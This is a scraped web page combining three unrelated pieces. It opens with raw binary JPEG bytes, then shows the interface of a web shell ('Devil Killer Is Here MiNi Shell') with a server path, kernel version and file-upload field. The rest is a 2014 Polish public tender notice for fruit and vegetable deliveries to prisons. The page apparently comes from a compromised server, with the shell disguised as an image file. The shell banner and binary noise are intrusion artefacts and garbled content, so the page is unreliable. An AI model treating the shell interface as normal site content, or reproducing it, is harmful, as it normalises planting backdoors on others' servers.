JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140917/197915-N-2014.html

<p class="kh_header"><b>Gdańsk: znak sprawy: 9/2014/BIGB O/POTULICE  Dostawy warzyw i owoców</b><br>
<b>Numer ogłoszenia: 197915 - 2014; data zamieszczenia: 17.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igbbaltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: IGB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> znak sprawy: 9/2014/BIGB O/POTULICE  Dostawy warzyw i owoców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.
Przedmiot zamówienia
Grupa 1

ZK Włocławek
Grupa 2
(ZK Potulice,Kuchni
AŚ Bydgoszcz, ZK Koronowo,OZ Bydgoszcz
ZK Bydgoszcz-Fordon,Kuchnia
AŚ Chojnice)
Grupa 3

(ZK Nr 1 Grudziądz, 
ZK Nr 2 Grudziądz)
Grupa 4

(AŚ Inowrocław,
AŚ Toruń, )
1. 
Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jednostka miary kilogram.
CPV: 03212100-6.

ilość szacunkowa: 1500 kg
-
-
2. 
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221112-4

ilość szacunkowa: 800 kg
-
-
3. 
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, jednostka miary kilogram.
CPV: 03221410-3. 

ilość szacunkowa: 400 kg
-
-
4. 
Groch łuskany, połówki, jednostka miary kilogram.
CPV: 03221220-4. 

ilość szacunkowa: 400 kg
-
-
5. 
Fasola typu Jaś, duża, jednostka miary kilogram.
CPV: 03221210-1. 

ilość szacunkowa: 400 kg
-
-
6. 
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
Ilość szacunkowa 
1500 kg
ilość szacunkowa: 3000 kg
ilość szacunkowa: 1000 kg
ilość szacunkowa: 300 kg
7. 
Burak ćwikłowy - średniej wielkości, jednostka miary kilogram.
CPV: 03221111-7. 

ilość szacunkowa: 1000 kg
-
-
8. 
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221100-7. 

ilość szacunkowa: 
160 kg
-
-
9. 
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm jednostka miary kilogram.
CPV: 03221300-9.

ilość szacunkowa: 
100 kg
-
-
10. 
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram.
CPV: 03221300-9.

ilość szacunkowa: 
100 kg
-
-
11. 
Koper włoski - fenkuł, jednostka miary kilogram.
CPV: 03221300-9.

ilość szacunkowa: 
50 kg
-
-
12. 
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram.
CPV: 03221270-9. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 1000 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 500 kg
13. 
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
14. 
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, jednostka miary kilogram.
CPV: 03221260-6. 

ilość szacunkowa: 700 kg
-
-
15. 
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram.
CPV: 03221240-0. 
ilość szacunkowa: 800 kg
ilość szacunkowa: 1100 kg
ilość szacunkowa: 1000 kg
ilość szacunkowa: 600 kg
16. 
Por - oczyszczony, gruby, w całości, jednostka miary kilogram.
CPV: 03222230-4. 

ilość szacunkowa: 
150 kg
-
-
17. 
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 

ilość szacunkowa: 
100 kg


18. 
Seler naciowy, jednostka miary kilogram.
CPV: 03221000-6

ilość szacunkowa:
50 kg
-
-
19. 
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, jednostka miary kilogram.
CPV: 03221410-3. 

ilość szacunkowa: 200 kg
-
-
20. 
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, jednostka miary kilogram.
CPV: 03221410-3. 

ilość szacunkowa: 800 kg
-
-
21. 
Kapusta pekińska, główki o minimalnej średnicy 10 cm i minimalnej długości 20 cm, jednostka miary kilogram.
CPV: 03221410-3. 

ilość szacunkowa: 800 kg
-
-
22. 
Cukinia - jednostka miary kg.
CPV: 03221250-3.

ilość szacunkowa:  600  kg
-
-
23. 
Bakłażan, jednostka miary kilogram.
CPV: 03221000-6

ilość szacunkowa: 200 kg
-
-
24. 
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
ilość szacunkowa: 50  szt
ilość szacunkowa: 500 szt.
ilość szacunkowa: 50 szt.
ilość szacunkowa: 50 szt.
25. 
Sałata lodowa główka  -  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 50  szt
ilość szacunkowa: 600 szt.
-
-
26. 
Sałata karbowana czerwona główka,  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 50  szt
ilość szacunkowa: 300 szt.
-
-
27. 
Kalafior, jednostka miary szt.
CPV: 03221420-6.

ilość szacunkowa: 1000 szt.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 
50 szt.
28. 
Brokuły, jednostka miary szt.
CPV: 03221430-9. 

ilość szacunkowa: 1000 szt.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 50szt.
29. 
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
ilość szacunkowa: 250  szt
ilość szacunkowa: 450 szt.
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
30. 
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
31. 
Mięta świeża doniczka, jednostka miary szt.
CPV: 03121100-6. 

ilość szacunkowa: 
30 szt.
-
-
32. 
Bazylia świeża doniczka,  jednostka miary szt.
CPV: 03121100-6.

ilość szacunkowa: 
30 szt.
-
-
33. 
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
ilość szacunkowa: 
300 kg
ilość szacunkowa:
350 kg
ilość szacunkowa: 
300 kg
ilość szacunkowa: 
400 kg
34. 
Kapusta kwaszona z marchewką - bez konserwantów, jednostka miary kilogram.
CPV: 03221410-3. 

ilość szacunkowa: 600 kg
-
-
35. 
Banany - jednostka miary kg.
CPV: 03222111-4. 
ilość szacunkowa: 800 kg
ilość szacunkowa: 1000 kg
ilość szacunkowa: 1500 kg
ilość szacunkowa: 1000 kg
36. 
Grejpfruty - jednostka miary kg.
CPV: 03222230-4. 
ilość szacunkowa: 800 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 1200 kg
ilość szacunkowa: 800 kg
37. 
Winogrona zielone - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 400 kg
38. 
Winogrona fioletowe - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 400 kg
39. 
Gruszki - jednostka miary kg.
CPV: 03222322-6. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 600 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 400 kg
40. 
Kiwi - jednostka miary kg.
CPV: 03222118-3. 
ilość szacunkowa: 
300 kg
ilość szacunkowa: 
500 kg
ilość szacunkowa: 
400 kg
ilość szacunkowa: 
350 kg
41. 
Ananas - jednostka miary szt. 
CPV: 03222240-7. 

ilość szacunkowa: 100 szt.
-
-
42. 
Cytryny, jednostka miary kilogram.
CPV: 03222210-8. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 700 kg
43. 
Jabłka - całe, średniej wielkości, jednostka miary kilogram.
CPV: 03222321-9. 
ilość szacunkowa: 2000 kg
ilość szacunkowa: 1400 kg
ilość szacunkowa: 2500 kg
ilość szacunkowa: 2000 kg
44. 
Arbuz - (sezonowo) jednostka miary kg.
CPV: 03222200-1.

ilość szacunkowa: 100 kg
ilość szacunkowa: 100 kg
ilość szacunkowa: 100 kg
45. 
Brzoskwinia (sezonowo), jednostka miary kg.
CPV: 03222332-9. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 600 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
46. 
Pomarańcze  jednostka miary kg.
CPV: 03222220-1
ilość szacunkowa: 500 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
47. 
Mandarynki jednostka miary kg.
CPV: 03222240-7
ilość szacunkowa: 1000 kg
ilość szacunkowa: 1000 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-6, 03.22.11.12-1, 03.22.12.70-9, 03.22.12.40-0, 03.22.13.10-2, 03.22.22.30-4, 03.22.23.40-8, 03.22.21.18-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i lub pkt 2
2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1
3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy
4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego;
5) zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego
6) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3
3. Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu, z zastrzeżeniem pkt 5.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbbaltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA O/POTULICE
ul.Aleja Parkowa 1
89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2014 godzina 12:00, miejsce: BIGB BALTICA O/POTULICE
ul.Aleja Parkowa 1
89-120 Potulice /sekretariat ZK w Potulicach/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1 ZK Włocławek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Cebula - średniej wielkości, 
CPV: 03221112-1. 
kg
1500
2
Ogórek zielony - twardy, średniej wielkości, w całości, polny, CPV: 03221270-9.
kg
500 
3
Papryka surowa - czerwona, cała, 
CPV: 03221230-7.
kg
200 
4
Pomidor - czerwony, cały, średniej wielkości, polny, CPV: 03221240-0.
kg
800
5
Sałata głowiasta kl. I, 
CPV: 03221310-2.
szt.
50
6
Sałata lodowa główka, 
CPV: 03221310-2. 
szt.
50
7
Sałata karbowana czerwona główka, 
CPV: 03221310-2.
szt.
50
8
Pomidor koktajlowy tacka 500 g, 
CPV: 03221240-0.
szt.
150
9
Rzodkiewka, 
CPV: 03221100-7.
szt.
500
